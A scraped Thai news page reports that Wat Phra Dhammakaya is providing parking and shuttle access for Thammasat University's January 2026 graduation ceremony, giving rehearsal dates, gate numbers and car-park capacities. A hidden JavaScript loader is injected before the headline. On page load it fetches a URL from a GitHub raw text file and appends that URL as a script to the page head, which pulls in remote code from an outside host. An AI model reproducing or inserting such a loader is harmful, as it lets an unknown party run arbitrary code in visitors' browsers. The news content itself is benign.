;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ปทุมธานี วัดพระธรรมกาย อนุเคราะห์ที่จอดรถ พิธีพระราชทานปริญญาบัตร มหาวิทยาลัยธรรมศาสตร์ - ThaiReference | อาสาไทยยืนยัน
ปทุมธานี วัดพระธรรมกาย อนุเคราะห์ที่จอดรถ พิธีพระราชทานปริญญาบัตร มหาวิทยาลัยธรรมศาสตร์

พระมหานพพร ปุญฺญชโย ป.ธ.9 ผู้ช่วยเจ้าอาวาสวัดพระธรรมกาย เปิดเผยว่า ด้วยพระบาทสมเด็จพระเจ้าอยู่หัว และสมเด็จพระนางเจ้าฯ พระบรมราชินี ทรงรับเชิญเสด็จพระราชดำเนินไปพระราชทานปริญญาบัตรแก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยธรรมศาสตร์ ประจำปีการศึกษา 2567 ในวันเสาร์ที่ 17 และวันอาทิตย์ที่ 18 มกราคม 2569

สำหรับพิธีรับพระราชทานปริญญาบัตรจากพานเบื้องหน้าพระบรมฉายาลักษณ์สมเด็จพระเจ้าอยู่หัวแก่ผู้สำเร็จการศึกษาระดับบัณฑิตศึกษา จะจัดขึ้นในวันที่ 18 มกราคม 2569 และกำหนดซ้อมวันศุกร์ที่ 9 มกราคม 2569 วันซ้อมใหญ่ วันเสาร์ที่ 10 และวันอาทิตย์ที่ 11 มกราคม 2569 ณ อาคารกิติยาคาร มหาวิทยาลัยธรรมศาสตร์ ศูนย์รังสิต

ในการนี้คาดว่าจะมีจำนวนผู้ปกครอง บัณฑิต และญาติบัณฑิต มาร่วมในพิธีดังกล่าวไม่ต่ำกว่า 30,000 คน ดังนั้นเพื่อให้การบริหารจัดการด้านการจราจรบริเวณพื้นที่โดยรอบเป็นไปด้วยความเรียบร้อย และเป็นการอำนวยความสะดวกแก่ผู้ปกครอง บัณฑิต และญาติบัณฑิต ที่เดินทางมาร่วมพิธี

วัดพระธรรมกาย จึงได้ให้ความอนุเคราะห์มหาวิทยาลัยธรรมศาสตร์ ใช้สถานที่ภายในวัดพระธรรมกายเป็นสถานที่สำหรับจอดรถ ในวันที่ 9-11 และ 17-18 มกราคม ๒๕๖๙ ระหว่างเวลา 15.00-20.00 น. โดยมหาวิทยาลัยธรรมศาสตร์ จะดำเนินการจัดรถรับ-ส่ง ระหว่างวัดพระธรรมกาย กับ มหาวิทยาลัยธรรมศาสตร์ ศูนย์รังสิต ตลอดทั้งวัน

ทั้งนี้ผู้ปกครอง บัณฑิต และญาติบัณฑิต ที่ประสงค์จะ เข้ามาจอดรถในวัดพระธรรมกาย ขอความร่วมมือใช้ทางเข้าที่ประตู 7 และประตู 8 โดยจอดรถได้ที่อาคารจอดรถ 1 รองรับรถส่วนบุคคลได้ 2,500 คัน และลานจอดรถ P3 รองรับรถบัสโดยสารขนาดใหญ่ได้ 300 คัน และจะมีรถเวียน (Shuttle Bus) ของมหาวิทยาลัยธรรมศาสตร์จอดรอรับส่งตลอดวัน